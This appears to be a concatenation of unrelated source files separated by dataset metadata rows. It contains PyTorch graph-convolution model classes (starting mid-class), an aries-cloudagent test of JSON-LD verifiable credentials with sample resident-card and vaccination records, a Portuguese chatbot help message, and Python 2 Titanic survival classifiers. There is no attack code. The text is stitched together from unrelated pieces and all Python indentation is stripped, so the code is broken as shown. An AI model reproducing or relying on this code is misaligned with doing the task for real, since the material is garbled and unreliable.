data.x = F.relu(self.conv2(data.x, data.edge_index))
data.x = F.relu(self.conv3(data.x, data.edge_index))
data.x = F.relu(self.conv4(data.x, data.edge_index))
data.x = F.relu(self.conv5(data.x, data.edge_index))
log.debug(data.x.view(-1).size())
data.x = self.fc1(data.x.view(-1))
data.x = self.fc2(data.x)
log.debug(data.x.size())
data.x = F.log_softmax(data.x.view(1, 2), dim=1)
log.debug(data.x.size())
return data.x
class GCN_8d_8d_16d_16d_32d(torch.nn.Module):
def __init__(self, numFeatures, numClasses):
super().__init__()
self.conv1 = GCNConv(numFeatures, 8)
self.conv2 = GCNConv(8, 8)
self.conv3 = GCNConv(8, 16)
self.conv4 = GCNConv(16, 16)
self.conv5 = GCNConv(16, 32)
self.fc1 = torch.nn.Linear(768, 128)
self.fc2 = torch.nn.Linear(128, numClasses * 1)
def forward(self, data):
data.x = F.relu(self.conv1(data.x, data.edge_index))
data.x = F.dropout(data.x, training=self.training)
data.x = F.relu(self.conv2(data.x, data.edge_index))
data.x = F.dropout(data.x, training=self.training)
data.x = F.relu(self.conv3(data.x, data.edge_index))
data.x = F.dropout(data.x, training=self.training)
data.x = F.relu(self.conv4(data.x, data.edge_index))
data.x = F.dropout(data.x, training=self.training)
data.x = F.relu(self.conv5(data.x, data.edge_index))
data.x = F.dropout(data.x, training=self.training)
log.debug(data.x.view(-1).size())
data.x = self.fc1(data.x.view(-1))
data.x = self.fc2(data.x)
log.debug(data.x.size())
data.x = F.log_softmax(data.x.view(1, 2), dim=1)
log.debug(data.x.size())
return data.x
class GCN_8_8_16_16_32_32(torch.nn.Module):
def __init__(self, numFeatures, numClasses):
super().__init__()
self.conv1 = GCNConv(numFeatures, 8)
self.conv2 = GCNConv(8, 8)
self.conv3 = GCNConv(8, 16)
self.conv4 = GCNConv(16, 16)
self.conv5 = GCNConv(16, 32)
self.conv6 = GCNConv(32, 32)
self.fc1 = torch.nn.Linear(768, 128)
self.fc2 = torch.nn.Linear(128, numClasses * 1)
def forward(self, data):
data.x = F.relu(self.conv1(data.x, data.edge_index))
data.x = F.relu(self.conv2(data.x, data.edge_index))
data.x = F.relu(self.conv3(data.x, data.edge_index))
data.x = F.relu(self.conv4(data.x, data.edge_index))
data.x = F.relu(self.conv5(data.x, data.edge_index))
data.x = F.relu(self.conv6(data.x, data.edge_index))
log.debug(data.x.view(-1).size())
data.x = self.fc1(data.x.view(-1))
data.x = self.fc2(data.x)
log.debug(data.x.size())
data.x = F.log_softmax(data.x.view(1, 2), dim=1)
log.debug(data.x.size())
return data.x
class GCN_8_8_16_16_32_32_48(torch.nn.Module):
def __init__(self, numFeatures, numClasses):
super().__init__()
self.conv1 = GCNConv(numFeatures, 8)
self.conv2 = GCNConv(8, 8)
self.conv3 = GCNConv(8, 16)
self.conv4 = GCNConv(16, 16)
self.conv5 = GCNConv(16, 32)
self.conv6 = GCNConv(32, 32)
self.conv7 = GCNConv(32, 48)
self.fc1 = torch.nn.Linear(1152, 128)
self.fc2 = torch.nn.Linear(128, numClasses * 1)
def forward(self, data):
data.x = F.relu(self.conv1(data.x, data.edge_index))
data.x = F.relu(self.conv2(data.x, data.edge_index))
data.x = F.relu(self.conv3(data.x, data.edge_index))
data.x = F.relu(self.conv4(data.x, data.edge_index))
data.x = F.relu(self.conv5(data.x, data.edge_index))
data.x = F.relu(self.conv6(data.x, data.edge_index))
data.x = F.relu(self.conv7(data.x, data.edge_index))
log.debug(data.x.view(-1).size())
data.x = self.fc1(data.x.view(-1))
data.x = self.fc2(data.x)
log.debug(data.x.size())
data.x = F.log_softmax(data.x.view(1, 2), dim=1)
log.debug(data.x.size())
return data.x
class GCN_8_8_16_16_32_32_48_48(torch.nn.Module):
def __init__(self, numFeatures, numClasses):
super().__init__()
self.conv1 = GCNConv(numFeatures, 8)
self.conv2 = GCNConv(8, 8)
self.conv3 = GCNConv(8, 16)
self.conv4 = GCNConv(16, 16)
self.conv5 = GCNConv(16, 32)
self.conv6 = GCNConv(32, 32)
self.conv7 = GCNConv(32, 48)
self.conv8 = GCNConv(48, 48)
self.fc1 = torch.nn.Linear(1152, 128)
self.fc2 = torch.nn.Linear(128, numClasses * 1)
def forward(self, data):
data.x = F.relu(self.conv1(data.x, data.edge_index))
data.x = F.relu(self.conv2(data.x, data.edge_index))
data.x = F.relu(self.conv3(data.x, data.edge_index))
data.x = F.relu(self.conv4(data.x, data.edge_index))
data.x = F.relu(self.conv5(data.x, data.edge_index))
data.x = F.relu(self.conv6(data.x, data.edge_index))
data.x = F.relu(self.conv7(data.x, data.edge_index))
data.x = F.relu(self.conv8(data.x, data.edge_index))
log.debug(data.x.view(-1).size())
data.x = self.fc1(data.x.view(-1))
data.x = self.fc2(data.x)
log.debug(data.x.size())
data.x = F.log_softmax(data.x.view(1, 2), dim=1)
log.debug(data.x.size())
return data.x
class GCN_8_8_16_16_32_32_48_48_64(torch.nn.Module):
def __init__(self, numFeatures, numClasses):
super().__init__()
self.conv1 = GCNConv(numFeatures, 8)
self.conv2 = GCNConv(8, 8)
self.conv3 = GCNConv(8, 16)
self.conv4 = GCNConv(16, 16)
self.conv5 = GCNConv(16, 32)
self.conv6 = GCNConv(32, 32)
self.conv7 = GCNConv(32, 48)
self.conv8 = GCNConv(48, 48)
self.conv9 = GCNConv(48, 64)
self.fc1 = torch.nn.Linear(1536, 128)
self.fc2 = torch.nn.Linear(128, numClasses * 1)
def forward(self, data):
data.x = F.relu(self.conv1(data.x, data.edge_index))
data.x = F.relu(self.conv2(data.x, data.edge_index))
data.x = F.relu(self.conv3(data.x, data.edge_index))
data.x = F.relu(self.conv4(data.x, data.edge_index))
data.x = F.relu(self.conv5(data.x, data.edge_index))
data.x = F.relu(self.conv6(data.x, data.edge_index))
data.x = F.relu(self.conv7(data.x, data.edge_index))
data.x = F.relu(self.conv8(data.x, data.edge_index))
data.x = F.relu(self.conv9(data.x, data.edge_index))
log.debug(data.x.view(-1).size())
data.x = self.fc1(data.x.view(-1))
data.x = self.fc2(data.x)
log.debug(data.x.size())
data.x = F.log_softmax(data.x.view(1, 2), dim=1)
log.debug(data.x.size())
return data.x
class GCN_8_8_16_16_32_32_48_48_64_64(torch.nn.Module):
def __init__(self, numFeatures, numClasses):
super().__init__()
self.conv1 = GCNConv(numFeatures, 8)
self.conv2 = GCNConv(8, 8)
self.conv3 = GCNConv(8, 16)
self.conv4 = GCNConv(16, 16)
self.conv5 = GCNConv(16, 32)
self.conv6 = GCNConv(32, 32)
self.conv7 = GCNConv(32, 48)
self.conv8 = GCNConv(48, 48)
self.conv9 = GCNConv(48, 64)
self.conv10 = GCNConv(64, 64)
self.fc1 = torch.nn.Linear(1536, 128)
self.fc2 = torch.nn.Linear(128, numClasses * 1)
def forward(self, data):
data.x = F.relu(self.conv1(data.x, data.edge_index))
data.x = F.relu(self.conv2(data.x, data.edge_index))
data.x = F.relu(self.conv3(data.x, data.edge_index))
data.x = F.relu(self.conv4(data.x, data.edge_index))
data.x = F.relu(self.conv5(data.x, data.edge_index))
data.x = F.relu(self.conv6(data.x, data.edge_index))
data.x = F.relu(self.conv7(data.x, data.edge_index))
data.x = F.relu(self.conv8(data.x, data.edge_index))
data.x = F.relu(self.conv9(data.x, data.edge_index))
data.x = F.relu(self.conv10(data.x, data.edge_index))
log.debug(data.x.view(-1).size())
data.x = self.fc1(data.x.view(-1))
data.x = self.fc2(data.x)
log.debug(data.x.size())
data.x = F.log_softmax(data.x.view(1, 2), dim=1)
log.debug(data.x.size())
return data.x
class GCN_4_4_8_8_16_16_32(torch.nn.Module):
def __init__(self, numFeatures, numClasses):
super().__init__()
self.conv1 = GCNConv(numFeatures, 4)
self.conv2 = GCNConv(4, 4)
self.conv3 = GCNConv(4, 8)
self.conv4 = GCNConv(8, 8)
self.conv5 = GCNConv(8, 16)
self.conv6 = GCNConv(16, 16)
self.conv7 = GCNConv(16, 32)
self.fc1 = torch.nn.Linear(768, 128)
self.fc2 = torch.nn.Linear(128, numClasses * 1)
def forward(self, data):
data.x = F.relu(self.conv1(data.x, data.edge_index))
data.x = F.relu(self.conv2(data.x, data.edge_index))
data.x = F.relu(self.conv3(data.x, data.edge_index))
data.x = F.relu(self.conv4(data.x, data.edge_index))
data.x = F.relu(self.conv5(data.x, data.edge_index))
data.x = F.relu(self.conv6(data.x, data.edge_index))
data.x = F.relu(self.conv7(data.x, data.edge_index))
log.debug(data.x.view(-1).size())
data.x = self.fc1(data.x.view(-1))
data.x = self.fc2(data.x)
log.debug(data.x.size())
data.x = F.log_softmax(data.x.view(1, 2), dim=1)
log.debug(data.x.size())
return data.x
class GCN_8bn_8bn_16bn_16bn_32bn(torch.nn.Module):
def __init__(self, numFeatures, numClasses):
super().__init__()
self.conv1 = GCNConv(numFeatures, 8)
self.conv1_bn = nn.BatchNorm1d(8)
self.conv2 = GCNConv(8, 8)
self.conv2_bn = nn.BatchNorm1d(8)
self.conv3 = GCNConv(8, 16)
self.conv3_bn = nn.BatchNorm1d(16)
self.conv4 = GCNConv(16, 16)
self.conv4_bn = nn.BatchNorm1d(16)
self.conv5 = GCNConv(16, 32)
self.conv5_bn = nn.BatchNorm1d(32)
self.fc1 = torch.nn.Linear(768, 128)
self.fc2 = torch.nn.Linear(128, numClasses * 1)
def forward(self, data):
data.x = F.relu(self.conv1_bn(self.conv1(data.x, data.edge_index)))
data.x = F.relu(self.conv2_bn(self.conv2(data.x, data.edge_index)))
data.x = F.relu(self.conv3_bn(self.conv3(data.x, data.edge_index)))
data.x = F.relu(self.conv4_bn(self.conv4(data.x, data.edge_index)))
data.x = F.relu(self.conv5_bn(self.conv5(data.x, data.edge_index)))
log.debug(data.x.view(-1).size())
data.x = self.fc1(data.x.view(-1))
data.x = self.fc2(data.x)
log.debug(data.x.size())
data.x = F.log_softmax(data.x.view(1, 2), dim=1)
log.debug(data.x.size())
return data.x
| 34.368948 | 75 | 0.602273 | 3,267 | 20,587 | 3.665442 | 0.030915 | 0.162422 | 0.061127 | 0.103132 | 0.951649 | 0.935699 | 0.933027 | 0.924342 | 0.924342 | 0.923674 | 0 | 0.061872 | 0.240832 | 20,587 | 598 | 76 | 34.426421 | 0.704332 | 0.006266 | 0 | 0.870044 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090308 | false | 0 | 0.019824 | 0 | 0.200441 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
56573fbde592ae6faff635808ad15def68519f49 | 7,830 | py | Python | aries_cloudagent/vc/ld_proofs/tests/test_check.py | kuraakhilesh8230/aries-cloudagent-python | ee384d1330f6a50ff45a507392ce54f92900f23a | [
"Apache-2.0"
] | 247 | 2019-07-02T21:10:21.000Z | 2022-03-30T13:55:33.000Z | aries_cloudagent/vc/ld_proofs/tests/test_check.py | kuraakhilesh8230/aries-cloudagent-python | ee384d1330f6a50ff45a507392ce54f92900f23a | [
"Apache-2.0"
] | 1,462 | 2019-07-02T20:57:30.000Z | 2022-03-31T23:13:35.000Z | aries_cloudagent/vc/ld_proofs/tests/test_check.py | kuraakhilesh8230/aries-cloudagent-python | ee384d1330f6a50ff45a507392ce54f92900f23a | [
"Apache-2.0"
] | 377 | 2019-06-20T21:01:31.000Z | 2022-03-30T08:27:53.000Z | from asynctest import TestCase
from ..check import get_properties_without_context
from ...tests.document_loader import custom_document_loader
VALID_INPUT_DOC = {
"@context": [
"https://www.w3.org/2018/credentials/v1",
"https://w3id.org/citizenship/v1",
"https://w3id.org/security/bbs/v1",
],
"id": "https://issuer.oidp.uscis.gov/credentials/83627465",
"type": ["PermanentResidentCard", "VerifiableCredential"],
"description": "Government of Example Permanent Resident Card.",
"identifier": "83627465",
"name": "Permanent Resident Card",
"credentialSubject": {
"id": "did:example:b34ca6cd37bbf23",
"type": ["Person", "PermanentResident"],
"familyName": "SMITH",
"gender": "Male",
"givenName": "JOHN",
},
"expirationDate": "2029-12-03T12:19:52Z",
"issuanceDate": "2019-12-03T12:19:52Z",
"issuer": "did:example:489398593",
"proof": {
"type": "BbsBlsSignatureProof2020",
"nonce": "wrmPiSRm+iBqnGBXz+/37LLYRZWirGgIORKHIkrgWVnHtb4fDe/4ZPZaZ+/RwGVJYYY=",
"proofValue": "ABkB/wbvt6213E9eJ+aRGbdG1IIQtx+IdAXALLNg2a5ENSGOIBxRGSoArKXwD/diieDWG6+0q8CWh7CViUqOOdEhYp/DonzmjoWbWECalE6x/qtyBeE7W9TJTXyK/yW6JKSKPz2ht4J0XLV84DZrxMF4HMrY7rFHvdE4xV7ULeC9vNmAmwYAqJfNwY94FG2erg2K2cg0AAAAdLfutjMuBO0JnrlRW6O6TheATv0xZZHP9kf1AYqPaxsYg0bq2XYzkp+tzMBq1rH3tgAAAAIDTzuPazvFHijdzuAgYg+Sg0ziF+Gw5Bz8r2cuvuSg1yKWqW1dM5GhGn6SZUpczTXuZuKGlo4cZrwbIg9wf4lBs3kQwWULRtQUXki9izmznt4Go98X/ElOguLLum4S78Gehe1ql6CXD1zS5PiDXjDzAAAACWz/sbigWpPmUqNA8YUczOuzBUvzmkpjVyL9aqf1e7rSZmN8CNa6dTGOzgKYgDGoIbSQR8EN8Ld7kpTIAdi4YvNZwEYlda/BR6oSrFCquafz7s/jeXyOYMsiVC53Zls9KEg64tG7n90XuZOyMk9RAdcxYRGligbFuG2Ap+rQ+rrELJaW7DWwFEI6cRnitZo6aS0hHmiOKKtJyA7KFbx27nBGd2y3JCvgYO6VUROQ//t3F4aRVI1U53e5N3MU+lt9GmFeL+Kv+2zV1WssScO0ZImDGDOvjDs1shnNSjIJ0RBNAo2YzhFKh3ExWd9WbiZ2/USSyomaSK4EzdTDqi2JCGdqS7IpooKSX/1Dp4K+d8HhPLGNLX4yfMoG9SnRfRQZZQ==",
"verificationMethod": "did:example:489398593#test",
"proofPurpose": "assertionMethod",
"created": "2020-10-16T23:59:31Z",
},
}
INVALID_INPUT_DOC = {
"@context": [
"https://www.w3.org/2018/credentials/v1",
"https://w3id.org/citizenship/v1",
],
"id": "https://issuer.oidp.uscis.gov/credentials/83627465",
"type": ["PermanentResidentCard", "VerifiableCredential"],
"description": "Government of Example Permanent Resident Card.",
"identifier": "83627465",
"name": "Permanent Resident Card",
"credentialSubject": [
{
"id": "did:example:b34ca6cd37bbf23",
"type": ["Person", "PermanentResident"],
"familyName": "SMITH",
"gender": "Male",
"givenName": "JOHN",
},
{
"some_random": "value",
},
],
"expirationDate": "2029-12-03T12:19:52Z",
"issuanceDate": "2019-12-03T12:19:52Z",
"issuer": "did:example:489398593",
"proof": {
"type": "BbsBlsSignatureProof2020",
"nonce": "wrmPiSRm+iBqnGBXz+/37LLYRZWirGgIORKHIkrgWVnHtb4fDe/4ZPZaZ+/RwGVJYYY=",
"proofValue": "ABkB/wbvt6213E9eJ+aRGbdG1IIQtx+IdAXALLNg2a5ENSGOIBxRGSoArKXwD/diieDWG6+0q8CWh7CViUqOOdEhYp/DonzmjoWbWECalE6x/qtyBeE7W9TJTXyK/yW6JKSKPz2ht4J0XLV84DZrxMF4HMrY7rFHvdE4xV7ULeC9vNmAmwYAqJfNwY94FG2erg2K2cg0AAAAdLfutjMuBO0JnrlRW6O6TheATv0xZZHP9kf1AYqPaxsYg0bq2XYzkp+tzMBq1rH3tgAAAAIDTzuPazvFHijdzuAgYg+Sg0ziF+Gw5Bz8r2cuvuSg1yKWqW1dM5GhGn6SZUpczTXuZuKGlo4cZrwbIg9wf4lBs3kQwWULRtQUXki9izmznt4Go98X/ElOguLLum4S78Gehe1ql6CXD1zS5PiDXjDzAAAACWz/sbigWpPmUqNA8YUczOuzBUvzmkpjVyL9aqf1e7rSZmN8CNa6dTGOzgKYgDGoIbSQR8EN8Ld7kpTIAdi4YvNZwEYlda/BR6oSrFCquafz7s/jeXyOYMsiVC53Zls9KEg64tG7n90XuZOyMk9RAdcxYRGligbFuG2Ap+rQ+rrELJaW7DWwFEI6cRnitZo6aS0hHmiOKKtJyA7KFbx27nBGd2y3JCvgYO6VUROQ//t3F4aRVI1U53e5N3MU+lt9GmFeL+Kv+2zV1WssScO0ZImDGDOvjDs1shnNSjIJ0RBNAo2YzhFKh3ExWd9WbiZ2/USSyomaSK4EzdTDqi2JCGdqS7IpooKSX/1Dp4K+d8HhPLGNLX4yfMoG9SnRfRQZZQ==",
"verificationMethod": "did:example:489398593#test",
"proofPurpose": "assertionMethod",
"created": "2020-10-16T23:59:31Z",
},
}
VALID_VACCINATION_DOC = {
"@context": [
"https://www.w3.org/2018/credentials/v1",
"https://w3id.org/security/bbs/v1",
"https://w3id.org/vaccination/v1",
],
"type": ["VerifiableCredential", "VaccinationCertificate"],
"issuer": "replace_me",
"id": "urn:uvci:af5vshde843jf831j128fj",
"name": "COVID-19 Vaccination Certificate",
"description": "COVID-19 Vaccination Certificate",
"issuanceDate": "2019-12-03T12:19:52Z",
"expirationDate": "2029-12-03T12:19:52Z",
"credentialSubject": {
"type": "VaccinationEvent",
"batchNumber": "1183738569",
"administeringCentre": "MoH",
"healthProfessional": "MoH",
"countryOfVaccination": "NZ",
"recipient": {
"type": "VaccineRecipient",
"givenName": "JOHN",
"familyName": "SMITH",
"gender": "Male",
"birthDate": "1958-07-17",
},
"vaccine": {
"type": "Vaccine",
"disease": "COVID-19",
"atcCode": "J07BX03",
"medicinalProductName": "COVID-19 Vaccine Moderna",
"marketingAuthorizationHolder": "Moderna Biotech",
},
},
}
INVALID_VACCINATION_DOC = {
"@context": [
"https://www.w3.org/2018/credentials/v1",
"https://w3id.org/security/bbs/v1",
"https://w3id.org/vaccination/v1",
],
"type": ["VerifiableCredential", "VaccinationCertificate"],
"issuer": "replace_me",
"id": "urn:uvci:af5vshde843jf831j128fj",
"name": "COVID-19 Vaccination Certificate",
"description": "COVID-19 Vaccination Certificate",
"issuanceDate": "2019-12-03T12:19:52Z",
"expirationDate": "2029-12-03T12:19:52Z",
"credentialSubject": {
"type": "VaccinationEvent",
"batchNumber": "1183738569",
"administeringCentre": "MoH",
"healthProfessional": "MoH",
"countryOfVaccination": "NZ",
"recipient": {
"type": "VaccineRecipient",
"givenName": "JOHN",
"familyName": "SMITH",
"gender": "Male",
"birthDate": "1958-07-17",
"nonExistent": "hello",
},
"vaccine": {
"type": "Vaccine",
"disease": "COVID-19",
"atcCode": "J07BX03",
"medicinalProductName": "COVID-19 Vaccine Moderna",
"marketingAuthorizationHolder": "Moderna Biotech",
"nonExistent": {"hello": "goodbye"},
},
},
}
class TestCheck(TestCase):
def test_get_properties_without_context_valid(self):
assert (
get_properties_without_context(VALID_INPUT_DOC, custom_document_loader)
== []
)
def test_get_properties_without_context_invalid(self):
# document has extra property some_random and
# is missing the bbs context
assert get_properties_without_context(
INVALID_INPUT_DOC, custom_document_loader
) == [
"credentialSubject[1].some_random",
"proof.nonce",
"proof.proofValue",
"proof.verificationMethod",
"proof.proofPurpose",
"proof.created",
]
def test_get_properties_without_context_vaccination_valid(self):
assert (
get_properties_without_context(
VALID_VACCINATION_DOC, custom_document_loader
)
== []
)
def test_get_properties_without_context_vaccination_invalid(self):
assert get_properties_without_context(
INVALID_VACCINATION_DOC, custom_document_loader
) == [
"credentialSubject.recipient.nonExistent",
"credentialSubject.vaccine.nonExistent",
]
| 42.554348 | 841 | 0.6659 | 570 | 7,830 | 9.026316 | 0.280702 | 0.022741 | 0.034985 | 0.04723 | 0.916229 | 0.8931 | 0.870165 | 0.854811 | 0.83654 | 0.83654 | 0 | 0.096593 | 0.205364 | 7,830 | 183 | 842 | 42.786885 | 0.730312 | 0.00894 | 0 | 0.7 | 0 | 0.011765 | 0.603455 | 0.296506 | 0 | 0 | 0 | 0 | 0.035294 | 1 | 0.023529 | false | 0 | 0.017647 | 0 | 0.047059 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3b149c109e2a6bf848f0490ea5afaa36c4042a2e | 1,070 | py | Python | comandos.py | devgiordane/GioBot | b4f255d4a5abfe6f0c89286968372d97683679a9 | [
"MIT"
] | 4 | 2020-05-22T06:41:05.000Z | 2020-05-27T00:01:36.000Z | comandos.py | devgiordane/GioBot | b4f255d4a5abfe6f0c89286968372d97683679a9 | [
"MIT"
] | null | null | null | comandos.py | devgiordane/GioBot | b4f255d4a5abfe6f0c89286968372d97683679a9 | [
"MIT"
] | 3 | 2020-05-22T03:27:34.000Z | 2020-06-13T18:39:05.000Z | def listaComandos():
c = f"Oi, precisa de ajuda? eu respondo a esses comandos:\n/git - 💻 Envie seu username do github e veja suas informações publicas. \n/discord - 💬 Participe do nosso grupo no discord\n/pedra - ✊ Jogue contra mim e tente me vencer!\n/papel - ✋ Jogue contra mim e tente me vencer!\n/tesoura - ✌️ Jogue contra mim e tente me vencer!\n/goat - 🐐 Uma foto aleatória de um bode\n/cat - 🐱 Uma foto aleatória de um gato\n/dog - 🐶 Uma foto aleatória de um cachorro\n/fox - 🦊 Uma foto aleatória de uma raposa\n/pokemon - 🐉 Uma foto aleatória de um Pokémon"
return c
"""
/git - 💻 Envie seu username do github e veja suas informações publicas.
/discord - 💬 Participe do nosso grupo no discord
/pedra - ✊🏻 Jogue contra mim e tente me vencer!
/papel - ✋🏻 Jogue contra mim e tente me vencer!
/tesoura - ✌🏻 Jogue contra mim e tente me vencer!
/goat - 🐐 Uma foto aleatória de um bode
/cat - 🐱 Uma foto aleatória de um gato
/dog - 🐶 Uma foto aleatória de um cachorro
/fox - 🦊 Uma foto aleatória de uma raposa
/pokemon - 🐉 Uma foto aleatória de um Pokémon
""" | 62.941176 | 548 | 0.711215 | 199 | 1,070 | 3.944724 | 0.336683 | 0.089172 | 0.203822 | 0.229299 | 0.852229 | 0.852229 | 0.852229 | 0.745223 | 0.142675 | 0.142675 | 0 | 0 | 0.198131 | 1,070 | 17 | 549 | 62.941176 | 0.886946 | 0 | 0 | 0 | 0 | 0.333333 | 0.916382 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
3b2092b5d5a0abbea6fa1f865e4e5200222a2fc8 | 10,175 | py | Python | src/classifiers.py | JakeCowton/titanic | 0cce675e082b5f9f830e80c47d1f84857907ad06 | [
"MIT"
] | 1 | 2019-05-31T02:10:59.000Z | 2019-05-31T02:10:59.000Z | src/classifiers.py | JakeCowton/titanic | 0cce675e082b5f9f830e80c47d1f84857907ad06 | [
"MIT"
] | null | null | null | src/classifiers.py | JakeCowton/titanic | 0cce675e082b5f9f830e80c47d1f84857907ad06 | [
"MIT"
] | null | null | null | import numpy as np
from sklearn.ensemble import RandomForestClassifier
from utils import write_results, get_training_data,\
get_evaluation_data, get_testing_data,\
get_all_training_data, normalise_data
from evaluation import EvaluationMetrics
from slp import create_slp
from nn_manager import create_nn, call_nn
from ga_for_mlp import MLPFeatureSelector
from ga_for_rfc import RFCFeatureSelector
from ga_for_svm import SVMFeatureSelector
from sklearn import svm
K_FOLDS = 10
def random_forest():
test_df = get_testing_data()
ids = test_df.PassengerId.values
# Drop all but class
test_df = test_df.drop(["PassengerId", "Ticket", "Cabin",],
axis=1)
test_data = normalise_data(test_df).values
f_scores = []
for i in range(K_FOLDS):
train_df = get_training_data(fold=i)
eval_df = get_evaluation_data(fold=i)
expected_training_outputs = train_df.Survived.values
train_df = train_df.drop(["PassengerId", "Survived",
"Ticket", "Cabin"],
axis=1)
expected_eval_outputs = eval_df.Survived.values
eval_df = eval_df.drop(["PassengerId", "Survived",\
"Ticket", "Cabin"],
axis=1)
train_data = normalise_data(train_df).values
eval_data = normalise_data(eval_df).values
forest = RandomForestClassifier(n_estimators=200,
n_jobs=-1,
criterion="entropy")
forest = forest.fit(train_data, expected_training_outputs)
evaluation = forest.predict(eval_data)
em = EvaluationMetrics(evaluation, expected_eval_outputs)
f1 = em.calculate_f1()
f_scores.append(f1)
output = forest.predict(test_data)
write_results("rand_forest_entropy.csv", ids, output)
return f_scores
def slp():
test_df = get_testing_data()
ids = test_df.PassengerId.values
test_df = test_df.drop(["PassengerId", "Ticket", "Cabin",],
axis=1)
test_data = normalise_data(test_df).values
f_scores = []
for i in range(K_FOLDS):
train_df = get_training_data(fold=i)
eval_df = get_evaluation_data(fold=i)
expected_training_outputs = train_df.Survived.values
train_df = train_df.drop(["PassengerId", "Survived",
"Ticket", "Cabin"],
axis=1)
expected_eval_outputs = eval_df.Survived.values
eval_df = eval_df.drop(["PassengerId", "Survived",\
"Ticket", "Cabin"],
axis=1)
train_data = normalise_data(train_df).values
eval_data = normalise_data(eval_df).values
perceptron = create_slp(train_data, expected_training_outputs)
evaluation = []
for sample in eval_data:
evaluation.append(perceptron.recall(sample))
em = EvaluationMetrics(evaluation, expected_eval_outputs)
f1 = em.calculate_f1()
f_scores.append(f1)
output = []
for sample in test_data:
output.append(perceptron.recall(sample))
write_results("slp.csv", ids, output)
return f_scores
def mlp():
test_df = get_testing_data()
ids = test_df.PassengerId.values
test_df = test_df.drop(["PassengerId", "Ticket", "Cabin",],
axis=1)
test_data = normalise_data(test_df).values
f_scores = []
for i in range(K_FOLDS):
train_df = get_training_data(fold=i)
eval_df = get_evaluation_data(fold=i)
expected_training_outputs = train_df.Survived.values
train_df = train_df.drop(["PassengerId", "Survived",
"Ticket", "Cabin"],
axis=1)
expected_eval_outputs = eval_df.Survived.values
eval_df = eval_df.drop(["PassengerId", "Survived",\
"Ticket", "Cabin"],
axis=1)
train_data = normalise_data(train_df).values
eval_data = normalise_data(eval_df).values
no_of_inputs = len(train_data[0])
no_of_samples = len(train_data)
data = np.zeros(no_of_samples,dtype=[('inputs', float, no_of_inputs),
('outputs', float, 1)])
for i in range(len(train_data)):
data[i]['inputs'] = train_data[i]
data[i]['outputs'] = expected_training_outputs[i]
nn = create_nn(data, (no_of_inputs,3,1))
evaluation = []
for sample in eval_data:
out = call_nn(nn, sample[0])
if out >= 0.5:
evaluation.append(1)
else:
evaluation.append(0)
em = EvaluationMetrics(evaluation, expected_eval_outputs)
f1 = em.calculate_f1()
f_scores.append(f1)
output = []
for sample in test_data:
out = call_nn(nn, sample[0])
if out >= 0.5:
output.append(1)
else:
output.append(0)
write_results("mlp.csv", ids, output)
return f_scores
def sk_svm():
test_df = get_testing_data()
ids = test_df.PassengerId.values
test_df = test_df.drop(["PassengerId", "Ticket", "Cabin",],
axis=1)
test_data = normalise_data(test_df).values
f_scores = []
for i in range(K_FOLDS):
train_df = get_training_data(fold=i)
eval_df = get_evaluation_data(fold=i)
expected_training_outputs = train_df.Survived.values
train_df = train_df.drop(["PassengerId", "Survived",
"Ticket", "Cabin"],
axis=1)
expected_eval_outputs = eval_df.Survived.values
eval_df = eval_df.drop(["PassengerId", "Survived",\
"Ticket", "Cabin"],
axis=1)
train_data = normalise_data(train_df).values
eval_data = normalise_data(eval_df).values
clf = svm.LinearSVC()
clf.fit(train_data, expected_training_outputs)
evaluation = clf.predict(eval_data)
em = EvaluationMetrics(evaluation, expected_eval_outputs)
f1 = em.calculate_f1()
f_scores.append(f1)
output = clf.predict(test_data)
write_results("svm.csv", ids, output)
return f_scores
def ga_rfc():
test_df = get_testing_data()
ids = test_df.PassengerId.values
ga = RFCFeatureSelector()
features = ga.calculate()
print "RFC features:"
print features
test_data = ga.massage_data_without_outputs(test_df, features)
f_scores = []
for i in range(K_FOLDS):
train_df = get_training_data(fold=i)
eval_df = get_evaluation_data(fold=i)
expected_training_outputs = train_df.Survived.values
train_data = ga.massage_data_with_outputs(train_df, features)
expected_eval_outputs = eval_df.Survived.values
eval_data = ga.massage_data_with_outputs(eval_df, features)
no_of_inputs = features.count(1)
forest = RandomForestClassifier(n_estimators=1000,
n_jobs=-1,
criterion="entropy")
forest = forest.fit(train_data, expected_training_outputs)
evaluation = forest.predict(eval_data)
em = EvaluationMetrics(evaluation, expected_eval_outputs)
f1 = em.calculate_f1()
f_scores.append(f1)
output = forest.predict(test_data)
write_results("ga_rfc.csv", ids, output)
return f_scores
def ga_mlp():
test_df = get_testing_data()
ids = test_df.PassengerId.values
ga = MLPFeatureSelector()
features = ga.calculate()
print "MLP features:"
print features
test_data = ga.massage_data_without_outputs(test_df, features)
f_scores = []
for i in range(K_FOLDS):
train_df = get_training_data(fold=i)
eval_df = get_evaluation_data(fold=i)
expected_training_outputs = train_df.Survived.values
train_data = ga.massage_data_with_outputs(train_df, features)
expected_eval_outputs = eval_df.Survived.values
eval_data = ga.massage_data_with_outputs(eval_df, features)
no_of_inputs = features.count(1)
nn = create_nn(train_data, (no_of_inputs, 10, 1))
evaluation = []
for sample in eval_data:
out = call_nn(nn, sample[0])
if out >= 0.5:
evaluation.append(1)
else:
evaluation.append(0)
em = EvaluationMetrics(evaluation, expected_eval_outputs)
f1 = em.calculate_f1()
f_scores.append(f1)
output = []
for sample in test_data:
out = call_nn(nn, sample[0])
if out >= 0.5:
output.append(1)
else:
output.append(0)
write_results("ga_mlp.csv", ids, output)
return f_scores
